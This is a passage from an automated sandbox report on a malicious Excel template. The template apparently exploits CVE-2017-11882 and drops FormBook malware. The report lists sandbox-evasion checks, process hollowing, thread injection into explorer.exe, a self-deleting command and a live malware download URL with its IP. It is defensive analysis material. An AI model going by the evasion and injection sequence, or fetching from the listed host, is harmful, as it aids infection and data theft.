            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeRDTSC instruction interceptor: First address: 00000000013498E4 second address: 00000000013498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeRDTSC instruction interceptor: First address: 0000000001349B4E second address: 0000000001349B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000000798E4 second address: 00000000000798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079B4E second address: 0000000000079B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01349A80 rdtsc
            Source: C:\Users\Public\tynex.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816Thread sleep time: -300000s >= -30000s
            Source: C:\Users\Public\tynex.exe TID: 3004Thread sleep time: -60000s >= -30000s
            Source: C:\Users\Public\tynex.exe TID: 824Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 2252Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\Public\tynex.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000008.00000000.2169316587.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: tynex.exe, 00000005.00000003.2165543256.0000000000541000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
            Source: explorer.exe, 00000008.00000000.2177431267.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: C:\Users\Public\tynex.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01349A80 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0134ACC0 LdrLoadDll,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00980080 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009800EA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\tynex.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Users\Public\tynex.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Allocates memory in foreign processesShow sources
            Source: C:\Users\Public\tynex.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeThread register set: target process: 1388
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeThread register set: target process: 1388
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 1388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: D00000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 401000
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 402000
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 403000
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 404000
            Source: C:\Users\Public\tynex.exeMemory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 7EFDE008
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
            Source: C:\Users\Public\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000000.2169316587.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\tynex.exeQueries volume information: C:\Users\Public\tynex.exe VolumeInformation
            Source: C:\Users\Public\tynex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 458850 Sample: New_1007572_021.xltx Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 12 other signatures 2->64 11 EQNEDT32.EXE 11 2->11         started        16 EXCEL.EXE 30 10 2->16         started        process3 dnsIp4 50 inter-trading-service.com 160.153.129.234, 49165, 80 GODADDY-AMSDE United States 11->50 44 C:\Users\user\...44ew_1007572_021[1].exe, PE32 11->44 dropped 46 C:\Users\Public\tynex.exe, PE32 11->46 dropped 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->86 18 tynex.exe 1 6 11->18         started        48 C:\Users\user\...\~$New_1007572_021.xltx, data 16->48 dropped file5 signatures6 process7 file8 38 C:\Users\user\AppData\Local\Temp\tynex.exe, PE32 18->38 dropped 66 Multi AV Scanner detection for dropped file 18->66 68 Machine Learning detection for dropped file 18->68 70 Writes to foreign memory regions 18->70 72 2 other signatures 18->72 22 tynex.exe 5 18->22         started        signatures9 process10 file11 40 C:\Users\user\AppData\...\FB_C479.tmp.exe, PE32 22->40 dropped 42 C:\Users\user\AppData\...\FB_BFF5.tmp.exe, PE32 22->42 dropped 74 Multi AV Scanner detection for dropped file 22->74 76 Machine Learning detection for dropped file 22->76 26 FB_C479.tmp.exe 22->26         started        29 FB_BFF5.tmp.exe 22->29         started        signatures12 process13 signatures14 78 Antivirus detection for dropped file 26->78 80 Multi AV Scanner detection for dropped file 26->80 82 Machine Learning detection for dropped file 26->82 84 5 other signatures 26->84 31 explorer.exe 26->31 injected process15 process16 33 cscript.exe 31->33         started        signatures17 52 Modifies the context of a thread in another process (thread injection) 33->52 54 Maps a DLL or memory area into another process 33->54 56 Tries to detect virtualization through RDTSC time measurements 33->56 36 cmd.exe 33->36         started        process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New_1007572_021.xltx39%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe100%AviraTR/Crypt.ZPACK.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\tynex.exe100%Joe Sandbox ML
            C:\Users\Public\tynex.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
            C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe5%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe2%ReversingLabs
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe49%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe86%ReversingLabsWin32.Trojan.FormBook
            C:\Users\user\AppData\Local\Temp\tynex.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
            C:\Users\Public\tynex.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.0.FB_C479.tmp.exe.1340000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.2.tynex.exe.36294d0.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            7.2.FB_C479.tmp.exe.1340000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.2.tynex.exe.39186d0.6.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            7.1.FB_C479.tmp.exe.1340000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.tynex.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.1.tynex.exe.720000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.tynex.exe.276b818.2.unpack100%AviraTR/Dropper.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://inter-trading-service.com/Di4/New_1007572_021.exe0%Avira URL Cloudsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://www.%s.com0%URL Reputationsafe
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            inter-trading-service.com
            160.153.129.234
            truetrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://inter-trading-service.com/Di4/New_1007572_021.exetrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.comtynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txttynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpfalse
                    high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpfalse
                      high
                      http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpfalse
                        high
                        http://www.msn.com/de-de/?ocid=iehpTexplorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpfalse
                          high
                          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1kexplorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpfalse
                            high
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truetynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oetynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpfalse
                              high
                              http://treyresearch.netexplorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000008.00000000.2177419686.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmpfalse
                                high
                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpfalse
                                  high
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checktynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.icra.org/vocabulary/.tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpfalse
                                        high
                                        http://investor.msn.com/tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.msn.com/?ocid=iehpexplorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.%s.comexplorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            low
                                            http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpfalse
                                              high
                                              http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.%s.comPAexplorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              low
                                              http://www.msn.com/de-de/?ocid=iehp3explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpfalse
                                                high
                                                http://%s.comexplorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                low

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                160.153.129.234
                                                inter-trading-service.comUnited States
                                                21501GODADDY-AMSDEtrue

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:458850
                                                Start date:03.08.2021
                                                Start time:19:47:50
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 11m 1s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:New_1007572_021.xltx
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLTX@13/9@2/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 27% (good quality ratio 25.8%)
                                                • Quality average: 72.2%
                                                • Quality standard deviation: 28.6%
                                                HCA Information:
                                                • Successful, ratio: 77%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xltx
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                • TCP Packets have been reduced to 100
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458850/sample/New_1007572_021.xltx

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                19:48:44API Interceptor67x Sleep call for process: EQNEDT32.EXE modified
